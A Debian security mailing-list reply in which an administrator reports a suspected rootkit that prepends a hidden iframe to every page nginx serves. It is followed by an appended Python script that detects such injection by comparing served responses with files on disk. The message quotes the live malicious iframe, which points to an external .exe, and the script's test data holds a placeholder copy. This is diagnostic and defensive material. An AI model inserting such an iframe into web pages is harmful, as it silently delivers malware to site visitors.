On Thu, Sep 12, 2013 at 09:13:46AM +0900, Joel Rees wrote:
> On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III <fra...@efball.com> wrote:
> > Last fall there was a Debian 64-bit / nginx rootkit going around,
> > now I've been hit with what sounds similar but on 32-bit wheezy.
> >
> > All files served by nginx have this line inserted at the top:
> >
> > <iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe>
> >
> > I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
> > Debian Wheezy i386 machine in a safe environment and did a diff -r. No
> > difference.
> >
> > No insmod line in /etc/rc.local
> >
> > I haven't been able to find anything. Googling doesn't show anything
> > similar for Debian wheezy i386, only squeeze 64-bit.
> >
> > I was using nginx-light from dotdeb.org. I uninstalled nginx and tried
> > the nginx-light from Debian wheezy but it made no difference.
>
> Just out of curiosity, did you back up nginx and check it as well?
>
> --
> Joel Rees

No, I just uninstalled nginx from dotdeb and installed from Debian.

The web pages are all static and remain unchanged, and the nginx config files are OK. The new line is added by some process I can't find.

The lynx web browser shows this as the first line of the web pages:

IFRAME: http://122.226.137.123:1111/yixi.exe

It also appears in downloads using wget. "View source" in Firefox or Chrome shows nothing amiss.

It only appears on IPv4, not IPv6.

I do not have PHP installed.

The HTTP header is completely different; curl -I shows this:

HTTP/1.1 200 OK
Content-Type: text/html; charset=en_US.UTF-8
Content-Length: 3634

When it should look more like this:

HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Wed, 11 Sep 2013 23:39:48 GMT
Content-Type: text/html; charset=en_US.UTF-8
Content-Length: 3291
Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5101a7f4-cdb"
Accept-Ranges: bytes

I installed chkrootkit, rkhunter, and unhide.rb and they found nothing.

E Frank Ball fra...@efball.com

--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20130912003916.gh30...@kamajii.efball.com
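A check for the three symptoms described in the reply above (bytes prepended to a static file, the usual nginx headers missing, and a Content-Length that does not match the file on disk), written as an added example that is not from the thread or from Debian; the bodies and header dumps are constructed, the iframe URL is a placeholder, and the "expected headers" set is taken from the healthy header dump in the message.

```python
import re
from dataclasses import dataclass, field

# Headers nginx normally adds to a static response (from the healthy dump in
# the thread); their absence means something else answered or rewrote the reply.
EXPECTED_HEADERS = {"server", "date", "last-modified", "etag", "accept-ranges"}
IFRAME_RE = re.compile(rb"<iframe[^>]*>.*?</iframe>", re.IGNORECASE | re.DOTALL)

@dataclass
class Finding:
    injected: bytes = b""             # bytes on the wire that are not on disk
    missing_headers: set = field(default_factory=set)
    length_mismatch: bool = False     # Content-Length != on-disk size
    def tampered(self) -> bool:
        return bool(self.injected or self.missing_headers or self.length_mismatch)

def parse_head(raw: str) -> dict:
    """Turn a 'curl -I' style dump into a dict keyed by lowercase header name."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:   # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

def compare(served_body: bytes, headers: dict, disk_body: bytes) -> Finding:
    """Flag anything that differs between what was served and what is on disk."""
    f = Finding()
    if served_body != disk_body:
        if served_body.endswith(disk_body):       # something was prepended
            f.injected = served_body[: len(served_body) - len(disk_body)]
        else:                                     # fall back to the known pattern
            m = IFRAME_RE.search(served_body)
            f.injected = m.group(0) if m else b"<body differs>"
    f.missing_headers = EXPECTED_HEADERS - set(headers)
    cl = headers.get("content-length", "")
    if cl.isdigit() and int(cl) != len(disk_body):
        f.length_mismatch = True
    return f

# Constructed sample data; 203.0.113.1 is a documentation address, not an indicator.
DISK_BODY = b"<html><body>static page</body></html>\n"
SERVED_BODY = (b'<iframe src= http://203.0.113.1:1111/EXAMPLE.exe width=0 height=0></iframe>\n'
               + DISK_BODY)
BAD_HEAD = "HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: 3634\n"
GOOD_HEAD = ("HTTP/1.1 200 OK\nServer: nginx/1.4.2\nDate: Wed, 11 Sep 2013 23:39:48 GMT\n"
             f"Content-Type: text/html\nContent-Length: {len(DISK_BODY)}\n"
             "Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT\nETag: \"5101a7f4-cdb\"\n"
             "Accept-Ranges: bytes\n")

def demo() -> Finding:
    return compare(SERVED_BODY, parse_head(BAD_HEAD), DISK_BODY)
```

Running the same comparison over both the IPv4 and IPv6 addresses of the host (the reply notes only IPv4 is affected) narrows down where in the path the rewrite happens.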